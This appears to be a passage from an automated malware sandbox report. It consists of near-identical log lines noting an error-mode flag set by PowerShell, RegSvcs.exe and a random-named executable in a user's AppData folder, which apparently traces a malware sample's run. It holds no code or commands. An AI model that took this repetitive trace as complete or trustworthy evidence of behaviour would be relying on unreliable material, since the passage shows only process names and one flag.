                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
